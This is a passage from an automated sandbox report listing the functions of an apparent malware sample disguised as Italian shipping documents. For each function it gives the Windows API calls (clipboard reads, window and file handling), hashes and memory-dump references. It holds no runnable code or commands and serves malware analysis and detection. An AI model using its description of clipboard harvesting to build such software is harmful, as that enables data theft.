                        • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                        • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                        • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                        • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                        Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32(?), ref: 0046DCE7
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                        • CloseClipboard.USER32 ref: 0046DD0D
                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                        • CloseClipboard.USER32 ref: 0046DD41
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                        • CloseClipboard.USER32 ref: 0046DD99
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                        • String ID:
                        • API String ID: 15083398-0
                        • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                        • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                        • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                        • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                        Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • GetWindowRect.USER32(?,?), ref: 00471CF7
                        • GetClientRect.USER32(?,?), ref: 00471D05
                        • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                        • GetSystemMetrics.USER32(00000008), ref: 00471D20
                        • GetSystemMetrics.USER32(00000004), ref: 00471D42
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                        • GetSystemMetrics.USER32(00000007), ref: 00471D79
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                        • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                        • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                        • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                        • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                        • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                        • GetClientRect.USER32(?,?), ref: 00471E8A
                        • GetStockObject.GDI32(00000011), ref: 00471EA6
                        • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                        • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                        • String ID: @$AutoIt v3 GUI
                        • API String ID: 867697134-3359773793
                        • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                        • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                        • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                        • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                        Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __wcsicoll$__wcsnicmp
                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                        • API String ID: 790654849-32604322
                        • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                        • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                        • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                        • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                        Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                        • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                        • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                        • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                        Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                        • _fseek.LIBCMT ref: 00452B3B
                        • __wsplitpath.LIBCMT ref: 00452B9B
                        • _wcscpy.LIBCMT ref: 00452BB0
                        • _wcscat.LIBCMT ref: 00452BC5
                        • __wsplitpath.LIBCMT ref: 00452BEF
                        • _wcscat.LIBCMT ref: 00452C07
                        • _wcscat.LIBCMT ref: 00452C1C
                        • __fread_nolock.LIBCMT ref: 00452C53
                        • __fread_nolock.LIBCMT ref: 00452C64
                        • __fread_nolock.LIBCMT ref: 00452C83
                        • __fread_nolock.LIBCMT ref: 00452C94
                        • __fread_nolock.LIBCMT ref: 00452CB5
                        • __fread_nolock.LIBCMT ref: 00452CC6
                        • __fread_nolock.LIBCMT ref: 00452CD7
                        • __fread_nolock.LIBCMT ref: 00452CE8
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                        • __fread_nolock.LIBCMT ref: 00452D78
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                        • String ID:
                        • API String ID: 2054058615-0
                        • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                        • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                        • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                        • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                        Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                        Download Yara Rule
                        APIs
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window
                        • String ID: 0
                        • API String ID: 2353593579-4108050209
                        • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                        • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                        • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                        • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                        Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetSysColor.USER32(0000000F), ref: 0044A05E
                        • GetClientRect.USER32(?,?), ref: 0044A0D1
                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                        • GetWindowDC.USER32(?), ref: 0044A0F6
                        • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                        • ReleaseDC.USER32(?,?), ref: 0044A11B
                        • GetSysColor.USER32(0000000F), ref: 0044A131
                        • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                        • GetSysColor.USER32(0000000F), ref: 0044A14F
                        • GetSysColor.USER32(00000005), ref: 0044A15B
                        • GetWindowDC.USER32(?), ref: 0044A1BE
                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                        • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                        • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                        • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                        • ReleaseDC.USER32(?,00000000), ref: 0044A229
                        • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                        • GetSysColor.USER32(00000008), ref: 0044A265
                        • SetTextColor.GDI32(?,00000000), ref: 0044A270
                        • SetBkMode.GDI32(?,00000001), ref: 0044A282
                        • GetStockObject.GDI32(00000005), ref: 0044A28A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                        • String ID:
                        • API String ID: 1744303182-0
                        • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                        • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                        • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                        • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                        Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                        • __mtterm.LIBCMT ref: 00417C34
                          • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                          • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                        • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                        • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                        • __init_pointers.LIBCMT ref: 00417CE6
                        • __calloc_crt.LIBCMT ref: 00417D54
                        • GetCurrentThreadId.KERNEL32 ref: 00417D80
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                        • API String ID: 4163708885-3819984048
                        • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                        • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                        • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                        • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                        Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __wcsicoll$IconLoad
                        • String ID: blank$info$question$stop$warning
                        • API String ID: 2485277191-404129466
                        • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                        • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                        • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                        • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                        Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • LoadIconW.USER32(?,00000063), ref: 0045464C
                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                        • SetWindowTextW.USER32(?,?), ref: 00454678
                        • GetDlgItem.USER32(?,000003EA), ref: 00454690
                        • SetWindowTextW.USER32(00000000,?), ref: 00454697
                        • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                        • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                        • GetWindowRect.USER32(?,?), ref: 004546F5
                        • SetWindowTextW.USER32(?,?), ref: 00454765
                        • GetDesktopWindow.USER32 ref: 0045476F
                        • GetWindowRect.USER32(00000000), ref: 00454776
                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                        • GetClientRect.USER32(?,?), ref: 004547D2
                        • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                        • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                        • String ID:
                        • API String ID: 3869813825-0
                        • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                        • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                        • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                        • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                        Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 00464B28
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                        • _wcslen.LIBCMT ref: 00464C28
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                        • _wcslen.LIBCMT ref: 00464CBA
                        • _wcslen.LIBCMT ref: 00464CD0
                        • _wcslen.LIBCMT ref: 00464CEF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcslen$Directory$CurrentSystem
                        • String ID: D
                        • API String ID: 1914653954-2746444292
                        • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                        • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                        • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                        • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                        Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                        Download Yara Rule
                        APIs
                        • _wcsncpy.LIBCMT ref: 0045CE39
                        • __wsplitpath.LIBCMT ref: 0045CE78
                        • _wcscat.LIBCMT ref: 0045CE8B
                        • _wcscat.LIBCMT ref: 0045CE9E
                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                        • _wcscpy.LIBCMT ref: 0045CF61
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
